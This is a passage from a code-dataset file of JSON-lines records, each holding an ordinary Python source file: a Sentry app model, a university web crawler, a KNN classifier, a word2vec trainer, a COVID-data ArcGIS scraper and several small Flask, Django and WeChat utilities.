Q(owner__in=user.get_orgs()),\n )\n\n @property\n def organizations(self):\n if not self.pk:\n return Organization.objects.none()\n\n return Organization \\\n .objects \\\n .select_related('sentry_app_installations') \\\n .filter(sentry_app_installations__sentry_app_id=self.id)\n\n @property\n def teams(self):\n from sentry.models import Team\n\n if not self.pk:\n return Team.objects.none()\n\n return Team.objects.filter(organization__in=self.organizations)\n\n @property\n def is_published(self):\n return self.status == SentryAppStatus.PUBLISHED\n\n def save(self, *args, **kwargs):\n self._set_slug()\n return super(SentryApp, self).save(*args, **kwargs)\n\n def is_installed_on(self, organization):\n return self.organizations.filter(pk=organization.pk).exists()\n\n def _set_slug(self):\n \"\"\"\n Matches ``name``, but in lowercase, dash form.\n\n >>> self._set_slug('My Cool App')\n >>> self.slug\n my-cool-app\n \"\"\"\n if not self.slug:\n self.slug = slugify(self.name)\n\n def build_signature(self, body):\n secret = self.application.client_secret\n return hmac.new(\n key=secret.encode('utf-8'),\n msg=body.encode('utf-8'),\n digestmod=sha256,\n 
).hexdigest()\n","sub_path":"src/sentry/models/sentryapp.py","file_name":"sentryapp.py","file_ext":"py","file_size_in_byte":4839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"373231851","text":"import re\r\nfrom urllib.parse import urlparse\r\nfrom lxml import html, etree\r\nimport requests\r\nfrom utils.download import download\r\nfrom bs4 import BeautifulSoup\r\n\r\nmaster_lst = [] # contains list of every valid URL that is passed to the frontier\r\ncount_unique_url = 0 # tracks the number of total unique URLs\r\nlongest_page = \"\" # stores the URL of the longest page\r\nnum_words_longest_page = 0 # tracks number of tokens on the longest url\r\nmaster_freq_dict = {} # stores all the tokens and tracks their frequency of appearance across all pages\r\nmaster_subdomain_dict = {} # stores the subdomains of ics.uci.edu and the frequency of each\r\n\r\n\r\ndef scraper(url, resp):\r\n global num_words_longest_page\r\n global longest_page\r\n global count_unique_url\r\n global master_freq_dict\r\n global master_subdomain_dict\r\n\r\n find_lst=[]\r\n token_list = []\r\n lst = []\r\n \r\n # filters to only accept URLs from the frontier that have a webpage status of 200 (high quality)\r\n # adds to a list all the relevant webpage text (p,h1,h2) and tokenizes it\r\n # tokenizer removes non alphabetical characters and stopwords from webpage text\r\n\r\n if resp.status == 200:\r\n page = resp.raw_response.text\r\n soup = BeautifulSoup(page, \"lxml\")\r\n total_count = 0\r\n find_lst.extend([s for s in soup.findAll('p')])\r\n find_lst.extend([s for s in soup.findAll('h1')])\r\n find_lst.extend([s for s in soup.findAll('h2')])\r\n for s in find_lst:\r\n fin_text = ''.join(s.findAll(text=True))\r\n fin_text = fin_text.lower()\r\n fin_text = re.sub('[^a-zA-Z]+', ' ', fin_text)\r\n \r\n fin_text = re.sub(r\"\\b(a|about|above|after|again|against|all|am|an|and|any|are|aren't|as|\"\r\n + r\"at|be|because|been|before|being|below|between|both|but|\"\r\n + r\"by|can't|cannot|could|couldn't|did|didn't|do|\"\r\n + r\"does|doesn't|doing|don't|down|during|each|few|for|from|further|had|hadn't|\"\r\n + r\"has|hasn't|have|haven't|having|he|he'd|he'll|he's|her|here|here's|hers|\"\r\n + r\"herself|him|himself|his|how|how's|i|i'd|i'll|i'm|i've|if|in|into|is|\"\r\n + r\"isn't|it|it's|its|itself|let's|me|more|most|mustn't|my|myself|no|nor|not|of|off|on|\"\r\n + r\"once|only|or|other|ought|our|ours|ourselves|out|over|own|\"\r\n + r\"same|shan't|she|she'd|she'll|she's|should|shouldn't|so|some|such|than|that|\"\r\n + r\"that's|the|their|theirs|them|themselves|then|there|there's|these|they|they'd|they'll|they're|\"\r\n + r\"they've|this|those|through|to|too|under|until|up|very|was|wasn't|we|we'd|we'll|we're|we've|were|weren't|\"\r\n + r\"what|what's|when|when's|where|where's|which|while|who|who's|whom|why|why's|with|won't|would|wouldn't|\"\r\n + r\"you|you'd|you'll|you're|you've|your|yours|yourself|yourselves)\\b\", ' ', fin_text)\r\n \r\n for token in fin_text.split():\r\n if len(token) > 2:\r\n token_list.append(token)\r\n if token not in master_freq_dict.keys():\r\n master_freq_dict[token] = 1\r\n else:\r\n master_freq_dict[token] += 1\r\n total_count += len(token_list)\r\n token_list = []\r\n \r\n # updates the respective global variable information for feedback report\r\n if total_count > num_words_longest_page:\r\n num_words_longest_page = total_count\r\n longest_page = url\r\n\r\n # ignores webpages that have low quality content (less than 100 tokens)\r\n # 
calls extract next links and adds to the frontier\r\n if total_count > 100 or url == \"https://www.ics.uci.edu\" or url == \"https://www.cs.uci.edu\" or url == \"https://www.informatics.uci.edu\" or url == \"https://www.stat.uci.edu\":\r\n master_lst.append(url)\r\n count_unique_url += 1\r\n \r\n # tracking subdomains of ics.uci.edu and frequency by adding to global dictionary\r\n parsed = urlparse(url)\r\n if(re.match(r\"^.*\\.ics.uci.edu$\", parsed.netloc)):\r\n subdomain_tup = (parsed.netloc.split(\".\")[0], parsed.scheme)\r\n if subdomain_tup in master_subdomain_dict.keys():\r\n master_subdomain_dict[subdomain_tup] += 1\r\n else:\r\n master_subdomain_dict[subdomain_tup] = 1\r\n\r\n \r\n links = extract_next_links(url, resp)\r\n for link in links:\r\n if is_valid(link) and link not in master_lst:\r\n lst.append(link)\r\n \r\n return lst\r\n\r\n# converts 200 status webpages to html and extracts links that are connected\r\n# returns the list of connected webpages\r\ndef extract_next_links(url, resp):\r\n lst = []\r\n \r\n if (resp.status == 200): #only want high quality content\r\n pages = resp.raw_response.content\r\n \r\n soup = BeautifulSoup(pages, 'lxml')\r\n \r\n \r\n for link in soup.findAll('a', href = True):\r\n lst.append(link['href'])\r\n \r\n return lst\r\n\r\n# determines which URLs are valid\r\n# only accepts valid domains and paths\r\n# defragments URLs and deems certain extensions invalid\r\n# recognizes wics is a crawler trap, and handles it explicitly\r\ndef is_valid(url):\r\n try:\r\n \r\n parsed = urlparse(url)\r\n if parsed.scheme not in set([\"http\", \"https\"]):\r\n return False\r\n\r\n\r\n if re.match(r\"^.*\\wics.ics.uci.edu$\", parsed.netloc.lower()) and re.match(r\"^(/event(s)?).*$\", parsed.path.lower()):\r\n return False\r\n if parsed.query != '' and re.match(r\"^.*\\wics.ics.uci.edu$\", parsed.netloc.lower()):\r\n if re.match(r\"^share.*$\", parsed.query.lower()):\r\n return False\r\n if re.match(r\"^today.uci.edu$\", parsed.netloc.lower()):\r\n if not re.match(r'^/department/information_computer_sciences/.*$', parsed.path.lower()):\r\n return False\r\n if re.match(r\"^.*/pdf/.*$\", parsed.path.lower()):\r\n return False\r\n \r\n if not re.match(r\"^((?!ics.uci.edu|stat.uci.edu|cs.uci.edu|informatics.uci.edu|today.uci.edu).)*$\", parsed.netloc.lower()):\r\n if parsed.fragment == '':\r\n return not re.match(\r\n r\".*\\.(css|js|bmp|gif|jpe?g|ico\"\r\n + r\"|png|tiff?|mid|mp2|mp3|mp4\"\r\n + r\"|wav|avi|mov|mpeg|ram|m4v|mkv|ogg|ogv|pdf\"\r\n + r\"|ps|eps|tex|ppt|pptx|doc|docx|xls|xlsx|names\"\r\n + r\"|data|dat|exe|bz2|tar|msi|bin|7z|psd|dmg|iso\"\r\n + r\"|epub|dll|cnf|tgz|sha1|ppsx\"\r\n + r\"|thmx|mso|arff|rtf|jar|csv|in|java|py\"\r\n + r\"|rm|smil|wmv|swf|wma|zip|rar|gz|r|c|txt|m|Z)$\", parsed.path.lower())\r\n \r\n \r\n return False\r\n \r\n except TypeError:\r\n print (\"TypeError for \", parsed)\r\n raise\r\n","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":7209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"645129815","text":"import math, os, sys, io, time\r\n\r\nclass ProbablisticKNN(object):\r\n \"\"\"\r\n ProbablisticKNN\r\n \"\"\"\r\n\r\n def __init__(self, training_data):\r\n \"\"\"\r\n The training data must be list\r\n of tuples. The first element in\r\n each tuple must be an integer\r\n that corresponds to a particular\r\n class. The second element in\r\n each tuple is a list, which is\r\n the input vector. 
Each input\r\n vector must have the same number\r\n as the others or an exception\r\n will be raised.\r\n \"\"\"\r\n\r\n self._class_column = []\r\n self._feature_column = []\r\n for x in training_data:\r\n self._validateDataPoint(x)\r\n self._class_column.append(x[0])\r\n self._feature_column.append(x[1])\r\n\r\n def getProbabilityForPoint(self, k_value, point, class_id):\r\n \"\"\"\r\n The point must be of type list.\r\n It is to be a vector with the\r\n same number of dimensions as\r\n each of the input vectors from\r\n the training data set (or an\r\n exception will be raised).\r\n The classification is the\r\n particular class that the data\r\n point supposedly belongs to.\r\n This method will return a\r\n floating point between 0 and\r\n 1 representing the probability\r\n that the given point is a\r\n member of the given class.\r\n The classification is an\r\n integer corresponding to\r\n the class. If the integer\r\n provided does not correspond\r\n to a class from the training\r\n data, an exception will be\r\n raised.\r\n \"\"\"\r\n\r\n index_list = self._findKNearestNeighbors(k_value, point)\r\n\r\n if type(class_id) is not type(int(0)):\r\n raise TypeError(\"class ID must be \" +\r\n \"of type integer\")\r\n\r\n if class_id not in self._class_column:\r\n raise RuntimeError(\"class ID must be \" +\r\n \"one of the values \" +\r\n \"found in the \" +\r\n \"classes of the \" +\r\n \"training data \" +\r\n \"points\")\r\n\r\n numerator_sum = int(0)\r\n for x in index_list:\r\n if self._class_column[x] == class_id:\r\n numerator_sum = numerator_sum + 1\r\n\r\n return float(numerator_sum) / float(k_value)\r\n\r\n def _findKNearestNeighbors(self, k_value, point):\r\n \"\"\"\r\n Returns a list of indexes\r\n to a subset of elements in\r\n the training dataset that\r\n make up the K-nearest\r\n neighbors to the input\r\n point.\r\n \"\"\"\r\n\r\n if type(k_value) is not type(int(0)):\r\n raise TypeError(\"k value must be \" +\r\n \"an integer\")\r\n\r\n length_of_feature_vector = len(self._feature_column[0])\r\n\r\n if type(point) is not type([]):\r\n raise TypeError(\"test point must be \" +\r\n \"feature vector of \" +\r\n \"type list\")\r\n\r\n if len(point) != length_of_feature_vector:\r\n raise TypeError(\"test point feature \" +\r\n \"vector must have \" +\r\n \"the same cardinality \" +\r\n \"as the feature \" +\r\n \"vectors in the \" +\r\n \"training data \")\r\n\r\n # just for testing...\r\n #print(length_of_feature_vector)\r\n #print(len(self._feature_column))\r\n #print(len(self._class_column))\r\n\r\n proximity_column = []\r\n ctr = int(0)\r\n for x in self._feature_column:\r\n proximity_float = self._proximity(x, point)\r\n temp_proximity_tuple = (ctr, proximity_float)\r\n proximity_column.append(temp_proximity_tuple)\r\n ctr = ctr + 1\r\n\r\n # just for testing\r\n #for x in proximity_column:\r\n # print(x[0])\r\n # print(x[1])\r\n\r\n #just for testing\r\n #for p in proximity_column:\r\n # print(p)\r\n # print(\"---\")\r\n #print(\"--end--\")\r\n\r\n countdown_k = k_value\r\n temp_prox_col = proximity_column\r\n k_nearest_proximities_tuples = []\r\n while(True):\r\n if countdown_k == int(0): break\r\n if len(temp_prox_col) == 0:\r\n raise RuntimeError(\"not enough data \" +\r\n \"points for \" +\r\n \"specified k \" +\r\n \"value\")\r\n temp_prox_tuple = temp_prox_col[0]\r\n first_iteration = True\r\n for i in temp_prox_col:\r\n if first_iteration == True:\r\n first_iteration = False\r\n continue\r\n if i[1] < temp_prox_tuple[1]:\r\n temp_prox_tuple = i\r\n 
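# The scan above selected the closest remaining (index, distance) tuple;\r\n # recording it and then removing it from temp_prox_col yields the k\r\n # nearest neighbours in ascending order of distance.\r\n 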
k_nearest_proximities_tuples.append(temp_prox_tuple)\r\n countdown_k = countdown_k - 1\r\n temp_prox_col.remove(temp_prox_tuple)\r\n indexes_of_k_nearest_neighbors = []\r\n for j in k_nearest_proximities_tuples:\r\n indexes_of_k_nearest_neighbors.append(j[0])\r\n return indexes_of_k_nearest_neighbors\r\n\r\n def _validateDataPoint(self, x):\r\n \"\"\"\r\n make sure that the data point\r\n is given in the proper format\r\n (and raise exception if not)\r\n \"\"\"\r\n\r\n if type(x) is not type(tuple()):\r\n raise TypeError(\"all data points \" +\r\n \"in training data \" +\r\n \"must be of type \" +\r\n \"tuple\")\r\n\r\n if type(x[0]) is not type(int(0)):\r\n raise TypeError(\"all class IDs \" +\r\n \"must be of type \" +\r\n \"integer\")\r\n\r\n if type(x[1]) is not type([]):\r\n raise TypeError(\"feature vector \" +\r\n \"for each data \" +\r\n \"point must be \" +\r\n \"of type list\")\r\n\r\n if len(self._feature_column) != 0:\r\n if len(x[1]) != len(self._feature_column[0]):\r\n raise TypeError(\"the feature \" +\r\n \"vector of \" +\r\n \"each point \" +\r\n \"in the \" +\r\n \"training \" +\r\n \"data set \" +\r\n \"must have \" +\r\n \"the same \" +\r\n \"cardinality\")\r\n\r\n float_list = x[1]\r\n\r\n for value in float_list:\r\n if type(value) is not type(float(0.0)):\r\n raise TypeError(\"each value in the \" +\r\n \"feature vector \" +\r\n \"must be of type \" +\r\n \"float\")\r\n\r\n def _proximity(self, list1, list2):\r\n \"\"\"\r\n determine the distance from\r\n one feature vector to another\r\n \"\"\"\r\n\r\n current_val = float(0.0)\r\n for i in range(0, len(list1)):\r\n temp = float(list1[i]) - float(list2[i])\r\n temp = math.pow(temp, 2)\r\n current_val = math.pow(math.pow(current_val, 2) + temp, 0.5)\r\n\r\n return current_val\r\n\r\n def listProbabilitiesAtPoint(self, k_value, point):\r\n \"\"\"\r\n returns a list of tuples\r\n each containing a class\r\n ID and a corresponding\r\n probability\r\n \"\"\"\r\n\r\n existing_class_ids = []\r\n for x in self._class_column:\r\n if x not in existing_class_ids:\r\n existing_class_ids.append(x)\r\n\r\n sorted_class_ids = []\r\n while(True):\r\n if len(existing_class_ids) < 1:\r\n break\r\n temp_lowest_id_val = existing_class_ids[0]\r\n for i in existing_class_ids:\r\n # pick the smallest remaining class ID\r\n if i < temp_lowest_id_val:\r\n temp_lowest_id_val = i\r\n sorted_class_ids.append(temp_lowest_id_val)\r\n existing_class_ids.remove(temp_lowest_id_val)\r\n\r\n list_of_tuples = []\r\n for x in sorted_class_ids:\r\n temp_prob = self.getProbabilityForPoint(k_value, point, x)\r\n temp_tuple = (x, temp_prob)\r\n list_of_tuples.append(temp_tuple)\r\n return list_of_tuples\r\n\r\n def classifyPoint(self, k_value, point):\r\n \"\"\"\r\n call the listProbabilitiesAtPoint\r\n method and determine which class\r\n has the highest probability for\r\n the given point\r\n \"\"\"\r\n\r\n probabilities = self.listProbabilitiesAtPoint(k_value, point)\r\n if len(probabilities) == 0:\r\n raise RuntimeError(\"listProbabilitiesAtPoint method \" +\r\n \"returned empty list\")\r\n counter = int(0)\r\n for x in probabilities:\r\n if counter == 0:\r\n max_prob_obj = x\r\n else:\r\n if x[1] > max_prob_obj[1]:\r\n max_prob_obj = x\r\n counter = counter + 1\r\n return max_prob_obj\r\n\r\n def classifyPointAndReturnOnlyClassID(self, k_value, point):\r\n \"\"\"\r\n just like classifyPoint except\r\n only the class ID (of type\r\n integer) is returned\r\n \"\"\"\r\n\r\n return self.classifyPoint(k_value, point)[0]\r\n\r\n def classifyPointAndReturnOnlyProbabilityValue(self, k_value, point):\r\n \"\"\"\r\n just like classifyPoint 
except\r\n only the probability value\r\n corresponding to the class\r\n with the highest probability\r\n is returned (only a float\r\n value is returned)\r\n \"\"\"\r\n\r\n return self.classifyPoint(k_value, point)[1]\r\n","sub_path":"knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":9771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"406612355","text":"#!/usr/bin/python\n__author__ = 'ytay2'\n\n# import libraries, modules\nimport gensim, logging\nimport os \nfrom nltk import word_tokenize\nimport nltk\nimport csv\nimport re\nfrom gensim.models import Word2Vec\nfrom gensim.corpora import WikiCorpus\nimport logging\nfrom _tools import *\nfrom _builder import * \nfrom _sentences import * \nimport argparse\nimport os.path\nimport datetime\n\n# Set up args parser\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-t\", \"--type\", type=str,\n help=\"full model or extracted sentences only\")\nparser.add_argument(\"-l\", \"--label\", type=str,\n help=\"label of model name\")\nparser.add_argument(\"-d\", \"--dim\", type=int,\n help=\"dimensions of model\")\nargs = parser.parse_args()\n\n\nmin_count = 10\nwindow = 5\nsg = 0\n\n#main script execution\nif __name__ == \"__main__\":\n\n\t# # Create a training log\n\t# trainLogs = open('train.txt','a+')\n\tsize = 100\n\tif(args.dim is not None):\n\t\tif(type(args.dim) is int):\n\t\t\tsize = args.dim\t\n\telse:\n\t\tsize = 100\n\tt0 = datetime.datetime.now().strftime(\"%I:%M%p on %B %d, %Y\")\n\tlogging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)\n\tlogging.info(\"Started training..from corpus directory\")\n\tlogging.info(\"Size:%d\",size)\n\tif(args.type=='extracted'):\n\t\t# # Get filelist of whatever that is completed\n\t\tfilelist = getCompletedFilelist()\n\t\tlogging.info(filelist)\n\t\tsentences = CSVSentences('Data',filelist,30,hyper=False)\n\telif(args.type=='full'):\n\t\tsentences = WIKISentences()\n\t\t#Train model\n\telif(args.type=='billion'):\n\t\tsentences = OneBillionSentences()\n\tmodel = gensim.models.Word2Vec(sentences, min_count=min_count,workers=4,size=size,window=window,sg=sg)\n\tlogging.info(\"Completed training model\")\n\t# label=args.label\n\tmodel_name = 'Final/w2v'+str(size) +\"_\"+args.type\n\tmodel.save(model_name)\n\tlogging.info(\"Persisted model %s to /Models directory\",model_name)\n\tt1 = datetime.datetime.now().strftime(\"%I:%M%p on %B %d, %Y\")\n\twith open('traininglog.txt','a+') as f:\n\t\twriter = csv.writer(f,delimiter=',')\n\t\twriter.writerow([model_name,t0,t1,min_count,window,sg,args.type])\n\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"82138895","text":"from abc import ABC, abstractmethod\n\nimport pandas as pd\nimport us\n\nfrom can_tools.scrapers import CMU, DatasetBase\nfrom can_tools.scrapers.official.base import ArcGIS\n\n\ndef case_cmu(**kw):\n kwargs = dict(category=\"cases\", measurement=\"cumulative\", unit=\"people\")\n kwargs.update(kw)\n return CMU(**kwargs)\n\n\ndef deaths_cmu(**kw):\n return case_cmu(category=\"deaths\", **kw)\n\n\nclass WisconsinArcGIS(ArcGIS, ABC):\n \"\"\"\n ArcGIS scraper that retrieves dashboard information for the\n state of Wisconsin (which has their own self-hosted ArcGIS\n instance)\n \"\"\"\n\n has_location = True\n state_fips = int(us.states.lookup(\"Wisconsin\").fips)\n source = 
\"https://www.dhs.wisconsin.gov/covid-19/data.htm\"\n source_name = \"Wisconsin Department of Health Services\"\n\n location_type: str\n SERVICE: str = \"DHS_COVID19/COVID19_WI\"\n SHEET: int\n\n crename = {\n \"positive\": CMU(\n category=\"cases\",\n measurement=\"cumulative\",\n unit=\"people\",\n ),\n \"negative\": CMU(\n category=\"pcr_tests_negative\",\n measurement=\"cumulative\",\n unit=\"unique_people\",\n ),\n \"pos_new\": CMU(\n category=\"cases\",\n measurement=\"new\",\n unit=\"people\",\n ),\n \"neg_new\": CMU(\n category=\"pcr_tests_negative\",\n measurement=\"new\",\n unit=\"unique_people\",\n ),\n \"test_new\": CMU(\n category=\"pcr_tests_total\",\n measurement=\"new\",\n unit=\"unique_people\",\n ),\n \"deaths\": CMU(category=\"deaths\", measurement=\"cumulative\", unit=\"people\"),\n \"dth_new\": CMU(category=\"deaths\", measurement=\"new\", unit=\"people\"),\n \"hosp_yes\": CMU(\n category=\"hospital_beds_in_use_covid\",\n measurement=\"cumulative\",\n unit=\"people\",\n ),\n # sex\n \"pos_fem\": case_cmu(sex=\"female\"),\n \"pos_male\": case_cmu(sex=\"male\"),\n \"dths_fem\": deaths_cmu(sex=\"female\"),\n \"dths_male\": deaths_cmu(sex=\"male\"),\n # age\n \"pos_0_9\": case_cmu(age=\"0-9\"),\n \"pos_10_19\": case_cmu(age=\"10-19\"),\n \"pos_20_29\": case_cmu(age=\"20-29\"),\n \"pos_30_39\": case_cmu(age=\"30-39\"),\n \"pos_40_49\": case_cmu(age=\"40-49\"),\n \"pos_50_59\": case_cmu(age=\"50-59\"),\n \"pos_60_69\": case_cmu(age=\"60-69\"),\n \"pos_70_79\": case_cmu(age=\"70-79\"),\n \"pos_80_89\": case_cmu(age=\"80-89\"),\n \"pos_90\": case_cmu(age=\"90_plus\"),\n \"dths_0_9\": deaths_cmu(age=\"0-9\"),\n \"dths_10_19\": deaths_cmu(age=\"10-19\"),\n \"dths_20_29\": deaths_cmu(age=\"20-29\"),\n \"dths_30_39\": deaths_cmu(age=\"30-39\"),\n \"dths_40_49\": deaths_cmu(age=\"40-49\"),\n \"dths_50_59\": deaths_cmu(age=\"50-59\"),\n \"dths_60_69\": deaths_cmu(age=\"60-69\"),\n \"dths_70_79\": deaths_cmu(age=\"70-79\"),\n \"dths_80_89\": deaths_cmu(age=\"80-89\"),\n \"dths_90\": deaths_cmu(age=\"90_plus\"),\n # race and ethnicity\n \"pos_aian\": case_cmu(race=\"ai_an\"),\n \"pos_asn\": case_cmu(race=\"asian\"),\n \"pos_blk\": case_cmu(race=\"black\"),\n \"pos_wht\": case_cmu(race=\"white\"),\n \"pos_mltoth\": case_cmu(race=\"multiple_other\"),\n \"pos_unk\": case_cmu(race=\"unknown\"),\n \"pos_e_hsp\": case_cmu(ethnicity=\"hispanic\"),\n \"pos_e_nhsp\": case_cmu(ethnicity=\"non-hispanic\"),\n \"pos_e_unk\": case_cmu(ethnicity=\"unknown\"),\n \"dths_aian\": deaths_cmu(race=\"ai_an\"),\n \"dths_asn\": deaths_cmu(race=\"asian\"),\n \"dths_blk\": deaths_cmu(race=\"black\"),\n \"dths_wht\": deaths_cmu(race=\"white\"),\n \"dths_mltoth\": deaths_cmu(race=\"multiple_other\"),\n \"dths_unk\": deaths_cmu(race=\"unknown\"),\n \"dths_e_hsp\": deaths_cmu(ethnicity=\"hispanic\"),\n \"dths_e_nhsp\": deaths_cmu(ethnicity=\"non-hispanic\"),\n \"dths_e_unk\": deaths_cmu(ethnicity=\"unknown\"),\n }\n\n @abstractmethod\n def get_location(self, df: pd.DataFrame):\n pass\n\n def fetch(self):\n return self.get_all_jsons(self.SERVICE, self.SHEET, \"server\")\n\n def arcgis_query_url(\n self,\n service=\"DHS_COVID19/COVID19_WI\",\n sheet=1,\n srvid=\"server\",\n ):\n out = f\"https://dhsgis.wi.gov/{srvid}/rest/services/{service}/MapServer/{sheet}/query\"\n\n return out\n\n def normalize(self, data):\n df = self.arcgis_jsons_to_df(data)\n df.columns = [x.lower() for x in list(df)]\n df[\"location\"] = self.get_location(df)\n\n value_cols = list(set(df.columns) & set(self.crename.keys()))\n\n out = (\n 
df.melt(id_vars=[\"location\"], value_vars=value_cols)\n .assign(\n dt=self._retrieve_dt(\"US/Central\"), vintage=self._retrieve_vintage()\n )\n .dropna()\n )\n out.loc[:, \"value\"] = pd.to_numeric(out[\"value\"])\n\n # Extract category information and add other variable context\n out = self.extract_CMU(out, self.crename)\n\n cols_to_keep = [\n \"vintage\",\n \"dt\",\n \"location\",\n \"category\",\n \"measurement\",\n \"unit\",\n \"age\",\n \"race\",\n \"ethnicity\",\n \"sex\",\n \"value\",\n ]\n\n return out.loc[:, cols_to_keep]\n\n\nclass WisconsinCounties(WisconsinArcGIS, DatasetBase):\n \"\"\"\n Fetch county-level covid data from Wisconsin's ARCGIS dashboard\n \"\"\"\n\n location_type = \"county\"\n SHEET = 1\n\n def get_location(self, df: pd.DataFrame):\n return df[\"geoid\"].astype(int)\n\n\nclass WisconsinState(WisconsinArcGIS, DatasetBase):\n \"\"\"\n Fetch state-level covid data from Wisconsin's ARCGIS dashboard\n Includes demographic breakdowns\n \"\"\"\n\n location_type = \"state\"\n SHEET = 3\n\n def get_location(self, df: pd.DataFrame):\n return self.state_fips\n","sub_path":"can_tools/scrapers/official/WI/wi_state.py","file_name":"wi_state.py","file_ext":"py","file_size_in_byte":5879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"70039285","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Aug 12 10:36:21 2020\n\n@author: RileyBallachay\n\"\"\"\nfrom scipy.signal import max_len_seq\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport random\nimport time\nimport control\n\nstart = time.time()\n\ndef PRBS(emptyArg,nstep=100,prob_switch=0.3, Range=[-1.0, 1.0]): \n \"\"\"Returns a pseudo-random binary sequence \n which ranges between -1 and +1\"\"\"\n gbn = np.ones(nstep)\n gbn = gbn*random.choice([-1,1])\n probability = np.random.random(nstep)\n for i in range(0,(nstep-1)):\n prob = probability[i]\n gbn[i+1] = gbn[i]\n if prob < prob_switch:\n gbn[i+1] = -gbn[i+1]\n gbn=gbn.reshape((len(gbn),1))\n return gbn\n \nrang=np.zeros(1000)\nuArray =np.array(list(map(PRBS,rang)))[...,-1]\n\ndef fun(iterator):\n sys = control.tf([np.random.randint(10),],[np.random.randint(10),1.])\n _,yEnd,_ = control.forced_response(sys,U=uArray[iterator,:],T=np.linspace(0,100,100))\n return yEnd\n\nyArray = np.array(list(map(fun,range(1000))))\n \nprint(str(time.time()-start))","sub_path":"Extras/Old Scripts/Test PRBS Methods.py","file_name":"Test PRBS Methods.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"486032","text":"# coding:utf-8\n\nfrom flask import Blueprint, render_template\nfrom ..settings import designer_per_page, designer_artifact_per_page\nfrom ..service import accountService, materialService, artifactService\nfrom ..model import account_type_designer, Artifact, Account\nfrom ..core import get_locale\nfrom ..result_helper import multi_artifact_result\n\nbp = Blueprint(\"designer\", __name__, url_prefix=\"/designer\")\n\n\n@bp.route(\"/\", methods=[\"GET\", \"POST\"])\n@bp.route(\"/page/<int:page>/\", methods=[\"GET\", \"POST\"])\ndef home(page=1):\n offset = (page - 1) * designer_per_page\n limit = designer_per_page\n count, designers = accountService.paginate(account_type=account_type_designer, offset=offset, limit=limit,orderby=[Account.id.desc()])\n return render_template(\"frontend/designers.html\", count=count, designers=designers, page=page)\n\n\n@bp.route(\"/detail/<int:account_id>/\", 
methods=[\"GET\", \"POST\"])\n@bp.route(\"/detail/<int:account_id>/artifact/page/<int:page>\", methods=[\"GET\", \"POST\"])\ndef show_designer(account_id, page=1):\n locale = get_locale()\n account = accountService.account_by_account_id(account_id)\n count = 0\n artifacts = []\n if account:\n offset = (page - 1) * designer_artifact_per_page\n limit = designer_artifact_per_page\n count, artifact_ids = artifactService.paginate_id(account_id=account_id, locale=locale,\n orderby=[Artifact.created.desc()], offset=offset, limit=limit)\n\n if artifact_ids:\n artifacts = multi_artifact_result(artifact_ids, locale, with_account=False, with_asset=False,\n with_material=False)\n\n return render_template(\"frontend/designerDetail.html\", artifact_count=count, artifacts=artifacts, designer=account,\n page=page)\n","sub_path":"xinshangjia/frontend/designer.py","file_name":"designer.py","file_ext":"py","file_size_in_byte":1838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"162064316","text":"# -*- coding: utf-8 -*-\n\nimport time\nimport traceback\nfrom sys import argv\n\nfrom wechatsogou import *\n\nwechats = WechatSogouApi()\nmysql = mysql('mp_info')\n\nfor i in range(1, len(argv)):\n try:\n print(\"添加公众号: \" + argv[i])\n if not mysql.where({'name': argv[i]}).find(1):\n wechat_info = wechats.search_gzh_info(argv[i])\n if wechat_info != \"\":\n mysql.add({'name': wechat_info['name'],\n 'wx_hao': wechat_info['wechatid'],\n 'description': wechat_info['jieshao'],\n 'company': wechat_info['renzhen'],\n 'logo_url': wechat_info['img'],\n 'qr_url': wechat_info['qrcode'],\n 'wz_url': wechat_info['url'],\n 'recent_wz': wechat_info['recent'],\n 'recent_time': wechat_info['recent_time'],\n 'last_qunfa_id': 0,\n 'create_time': time.strftime(\"%Y-%m-%d %H:%M:%S\",\n time.localtime(time.time()))})\n else:\n print(u\"已经存在的公众号: \" + argv[i])\n except Exception:\n traceback.print_exc()\n continue\nprint(\"success\")\n","sub_path":"auto_add_mp.py","file_name":"auto_add_mp.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"481237882","text":"from django import forms\nfrom django.utils.translation import gettext_lazy as _\nfrom django.conf import settings\n\nfrom oscar.apps.address.forms import UserAddressForm as BaseUserAddressForm\nfrom oscar.core.loading import get_model\n\nUserAddress = get_model('address', 'useraddress')\n\n\nclass UserAddressForm(BaseUserAddressForm):\n\n class Meta:\n model = UserAddress\n fields = [\n 'line4',\n 'line1', 'line2', 'line3',\n 'phone_number', 'notes'\n ]\n labels = {\n 'line1': _('Street'),\n 'line2': _('Building'),\n 'line3': _('Flat'),\n }\n widgets = {\n 'line4': forms.Select(choices=settings.ADDRESS_CITIES),\n }\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.fields['line1'].required = True\n self.fields['line2'].required = True\n self.fields['line3'].required = False\n self.fields['line4'].required = True\n self.fields['phone_number'].required = True\n","sub_path":"address/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"18902391","text":"from flask import Blueprint,request\nfrom database.models import Project\nfrom utils.decorator import json_response,require_token\nfrom services import project_service\nproject_api=Blueprint('project_api', 
